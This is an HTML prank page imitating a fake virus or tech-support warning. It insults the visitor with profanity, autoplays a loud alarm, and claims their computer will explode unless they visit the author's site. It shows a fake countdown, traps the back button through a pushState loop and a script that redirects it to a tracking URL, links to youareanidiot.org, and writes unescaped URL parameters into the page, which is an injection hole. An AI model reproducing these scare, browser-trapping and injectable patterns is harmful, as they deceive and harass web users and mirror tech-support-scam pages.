


<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Troll dialog by D Mack</title>


<link rel="shortcut icon" href="http://a14a895aaf4a57d76447-566a10397a629ff6c94f9531cc83a7ee.r58.cf1.rackcdn.com/favicon.jpg" sizes="16x16 32x32 48x48 64x64" type="image/png">
<link rel="icon" href="src="http://a14a895aaf4a57d76447-566a10397a629ff6c94f9531cc83a7ee.r58.cf1.rackcdn.com/favicon.jpg"" type="image/vnd.microsoft.icon"> 
<meta name="robots" content="noindex,nofollow">
   <script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
    );
}
</script>





<script> alert("Mute/turn down your sound, there's gonna be a loud beep.");</script>
<style type="text/css">
body {
 margin: 0;
 padding: 0;
 background: #eee;
}
.container {
 top: 35%;
 left: 50%;
 width: 30em;
 margin-top: -9em;
 margin-left: -15em;
 border: 1px solid #7498b8;
 background-color: #9ec6ea;
 position: fixed;
 padding: 5px;
 font-family: arial;
 border-radius: 2px;
}
.title {
 color: #162c41;
 text-align: center;
 padding: 10px 0;
 position: relative;
 height: 10px;
}
.close {
 position: absolute;
 top: -6px;
 right: 1px;
 background: #b90909;
 height: 30px;
 width: 40px;
 color: #fff;
 line-height: 30px;
 vertical-align: middle;
 border-radius: 0 0 2px 2px;
}
.close a {
 color: white;
 text-decoration: none;
}
.inner {
 border: 1px solid #8fa5bc;
 border-bottom: 0;
 background: #FFF;
 min-height: 150px;
 text-align: left;
 padding: 20px;
}
.inner img {
 float: left;
 margin: 0 10px 0 0;
 width: 25px;
 height: 25px;
}
.h1 {
 border-bottom: 1px solid #f1f1f1;
 padding-bottom: 10px;
 height: 25px;
 line-height: 25px;
 vertical-align: middle;
}
.details {
 margin: 10px 0 10px;
 border-bottom: 1px solid #f1f1f1;
 padding-bottom: 10px;
}
.bottom {
 background: #f0f0f0;
 border: 1px solid #a0a0a0;
 height: 36px;
 padding: 10px;
 text-align: right;
}
a.secure, a.secureclose {
 float: right;
 position: inline;
 text-align: center;
 height: 25px;
 width: 110px;
 border: 1px solid #adadad;
 background: #e7e7e7;
 color: #333;
 text-decoration: none;
 margin-top: 5px;
 line-height: 25px;
 vertical-align: middle;
 font-size: 13px;
 box-shadow: 1px 1px 1px #f8f8f8;
}
a.secureleft, a.secureclose {
 float: left;
 position: inline;
 text-align: center;
 height: 25px;
 width: 110px;
 border: 1px solid #adadad;
 background: #e7e7e7;
 color: #333;
 text-decoration: none;
 margin-top: 5px;
 line-height: 25px;
 vertical-align: middle;
 font-size: 13px;
 box-shadow: 1px 1px 1px #f8f8f8;
}
a.secureclose {
 width: 85px;
 border: 1px solid #678db4;
 margin-left: 10px;
 box-shadow: inset 1px 1px 1px #c9f9ff;
}
a.secure:hover {
 background: #e1e1e1;
}
</style>
<script type="text/javascript">
var navInfo = window.navigator.appVersion.toLowerCase();  
var so = '';  
  
function retornarSO()  
{  
    if(navInfo.indexOf('win') != -1)  
    {  
        so = 'Windows';  
    }  
    else if(navInfo.indexOf('linux') != -1)  
    {  
        so = 'Linux';  
    }  
    else if(navInfo.indexOf('mac') != -1)  
    {  
        so = 'Macintosh';  
    }  
      
    return so  
}
</script>
<script type="text/javascript">/*<![CDATA[*/!function(){var t;try{for(t=0;10>t;++t)history.pushState({},"","#");onpopstate=function(t){t.state&&location.replace("index.html")}}catch(c){}}();/*]]>*/</script><script type="text/javascript">function goto(){PreventExitPop=!1,location.href="index.html"}</script></head>


<body>
<audio autoplay preload=""><source src="alert.ogg" type="audio/ogg"><source src="alert.mp3" type="audio/mpeg"></audio>
<div class="container">
	<div class="title">  <!-- <img src="cross.PNG">   -->




<div style="text-height:0px; line-height:8px;">Ya fat cunt!</div>




<div class="close"><a target="_blank" href="warn.html">x</a></div>
	</div>
	<div class="inner"><img src="cross.png">
		<div class="h1"><strong>You visited this website on

    <script type="text/javascript">
                <!--

                var m_names = new Array("January", "February", "March", "April", "May", "June",
                 "July", "August", "September", "October", "November", "December");

                var d = new Date();
                var curr_month = d.getMonth();
                var curr_date = d.getDate();
                var curr_year = d.getFullYear();
                document.write(  m_names[curr_month] + " " + curr_date + " " +  curr_year);

                //-->
</script>  <script>document.write(getURLParameter('isp'))</script>  
</strong></div>
		<div class="details"><strong>Your computer is gonna fucking explode if you don't follow my instructions!<font color="blue"><script>document.write(getURLParameter('osversion'))</script></font></strong></div>
		<div class="details"><strong>Time left:</strong>
 <span style="color:red" id="timer">9999999999999999999999999999999999999999999999999999999999999999999999999999999999215</span> <span style="color:red">seconds.</span></div>
		<div> <strong style="color:red">what you need to do:</strong>Go to my website.</div>
	</div>
	<div class="bottom"> <a target="_blank" href="http://dmack6464.github.io" class="secure"><b>My website</b></a>
        <a href="http://youareanidiot.org" class="secureleft"><b>don't click</b></a></div>
<script>
var count=999999999999229;

var counter=setInterval(timer, 1000); //1000 will  run it every 1 second

function timer()
{
  count=count-1;
  if (count <= 0)
  {
     clearInterval(counter);
     //counter ended, do something here
     count=count+10;
     return;
  }
	document.getElementById("timer").innerHTML=count; 

}
</script>
 
     
         <script type="text/javascript" src="./microsoftwarning_files/backfix.min.js"></script>
 <script type="text/javascript">
        bajb_backdetect.OnBack = function() {
            window.history.back = function() {
                document.location = 'http://redirect.go-secure-click3.info/39eea1d8-ca8f-47c5-8b13-0fbe528d7306?media={{{media}}}&app={{{app}}}&site={{{site}}}&placement={{{placement}}}&cat={{{category}}}&device={{{device}}}&isp={{{carrier}}}&os={{{os_version}}}&cid={{{creative_id}}}&adid={{{ad_id}}}&bidhash={{{bidhash}}}';
            }
        }
    </script>
	
 </body></html>